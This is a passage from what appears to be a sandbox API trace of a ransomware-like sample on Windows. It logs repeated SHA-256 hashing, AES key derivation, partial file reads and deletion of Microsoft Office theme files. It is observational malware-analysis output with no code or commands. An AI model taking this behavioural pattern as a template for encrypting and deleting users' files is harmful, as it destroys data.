hFile=0x498, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0157.838] CryptDestroyHash (hHash=0x284d528) returned 1 [0157.838] CryptDestroyKey (hKey=0x284d568) returned 1 [0157.838] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0157.839] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Flow.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\flow.thmx")) returned 1 [0157.841] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0157.842] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0157.842] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.842] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0157.842] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf814 [0157.842] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0157.859] CryptDestroyHash (hHash=0x284d628) returned 1 [0157.859] CryptDestroyKey (hKey=0x284d568) returned 1 [0157.859] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0157.860] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Foundry.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\foundry.thmx")) returned 1 [0157.864] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0157.864] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0157.864] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.864] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0157.864] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd2e0 [0157.864] ReadFile (in: hFile=0x498, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0157.881] CryptDestroyHash (hHash=0x284d528) returned 1 [0157.882] CryptDestroyKey (hKey=0x284d568) returned 1 [0157.882] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0157.883] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Grid.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\grid.thmx")) returned 1 [0157.885] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0157.885] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0157.885] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.885] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0157.885] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x60041 [0157.885] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0157.949] CryptDestroyHash (hHash=0x284d628) returned 1 [0157.949] CryptDestroyKey (hKey=0x284d568) returned 1 [0157.949] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0157.950] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Hardcover.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\hardcover.thmx")) returned 1 [0157.994] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0157.994] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0157.994] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.994] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0157.994] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3becb [0157.995] ReadFile (in: hFile=0x498, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.007] CryptDestroyHash (hHash=0x284d528) returned 1 [0158.007] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.007] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.032] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Horizon.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\horizon.thmx")) returned 1 [0158.035] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0158.035] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0158.035] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.035] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0158.035] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x146a7 [0158.035] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.052] CryptDestroyHash (hHash=0x284d628) returned 1 [0158.052] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.052] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.053] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Median.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\median.thmx")) returned 1 [0158.055] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0158.056] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0158.056] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.056] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0158.056] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13af1 [0158.056] ReadFile (in: hFile=0x498, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.132] CryptDestroyHash (hHash=0x284d528) returned 1 [0158.132] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.132] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.134] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Metro.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\metro.thmx")) returned 1 [0158.137] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0158.137] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0158.137] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.137] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0158.137] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1583a [0158.137] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.157] CryptDestroyHash (hHash=0x284d628) returned 1 [0158.157] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.157] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.158] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Module.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\module.thmx")) returned 1 [0158.160] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0158.161] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0158.161] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.161] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0158.161] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x96ac7 [0158.161] ReadFile (in: hFile=0x498, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.219] CryptDestroyHash (hHash=0x284d528) returned 1 [0158.219] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.219] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.220] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Newsprint.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\newsprint.thmx")) returned 1 [0158.225] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0158.226] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0158.226] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.226] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0158.226] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x132b9 [0158.226] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.243] CryptDestroyHash (hHash=0x284d628) returned 1 [0158.243] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.243] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.245] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Opulent.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\opulent.thmx")) returned 1 [0158.247] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0158.247] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0158.247] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.247] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0158.247] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x16ef4 [0158.247] ReadFile (in: hFile=0x498, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.277] CryptDestroyHash (hHash=0x284d528) returned 1 [0158.277] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.277] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.278] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Oriel.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\oriel.thmx")) returned 1 [0158.281] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0158.282] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0158.282] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.282] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0158.282] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1540b [0158.282] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.317] CryptDestroyHash (hHash=0x284d628) returned 1 [0158.317] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.317] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.318] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Origin.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\origin.thmx")) returned 1 [0158.320] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0158.321] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0158.321] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.321] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0158.321] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x421e6 [0158.321] ReadFile (in: hFile=0x498, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.348] CryptDestroyHash (hHash=0x284d528) returned 1 [0158.348] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.348] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.349] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Paper.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\paper.thmx")) returned 1 [0158.353] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0158.354] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0158.354] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.354] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0158.354] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd15a [0158.354] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.383] CryptDestroyHash (hHash=0x284d628) returned 1 [0158.383] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.383] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.384] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Perspective.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\perspective.thmx")) returned 1 [0158.386] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0158.387] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0158.387] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.387] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0158.387] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc97ce [0158.387] ReadFile (in: hFile=0x498, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.474] CryptDestroyHash (hHash=0x284d528) returned 1 [0158.474] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.474] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.476] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Pushpin.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\pushpin.thmx")) returned 1 [0158.482] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0158.483] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0158.483] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.483] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0158.483] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x106e8 [0158.483] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.499] CryptDestroyHash (hHash=0x284d628) returned 1 [0158.499] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.499] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.500] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Slipstream.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\slipstream.thmx")) returned 1 [0158.502] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0158.503] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0158.503] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.503] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0158.503] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x124a0 [0158.503] ReadFile (in: hFile=0x498, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.537] CryptDestroyHash (hHash=0x284d528) returned 1 [0158.537] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.537] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.539] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Solstice.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\solstice.thmx")) returned 1 [0158.541] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0158.542] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0158.542] CryptHashData (hHash=0x284d628, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.542] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0158.542] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10d83 [0158.542] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.572] CryptDestroyHash (hHash=0x284d628) returned 1 [0158.572] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.572] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.574] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Technic.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\technic.thmx")) returned 1 [0158.577] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0158.577] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0158.577] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.577] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0158.577] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15d75 [0158.577] ReadFile (in: hFile=0x498, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0158.611] CryptDestroyHash (hHash=0x284d528) returned 1 [0158.611] CryptDestroyKey (hKey=0x284d568) returned 1 [0158.611] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.613] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Thatch.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\thatch.thmx")) returned 1 [0158.627] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0158.628] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0158.629] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0158.629] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.629] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0158.629] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3a0 [0158.629] ReadFile (in: hFile=0x498, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0158.640] CryptDestroyHash (hHash=0x284d568) returned 1 [0158.640] CryptDestroyKey (hKey=0x284d528) returned 1 [0158.640] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.641] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml" (normalized: "c:\\program files\\microsoft 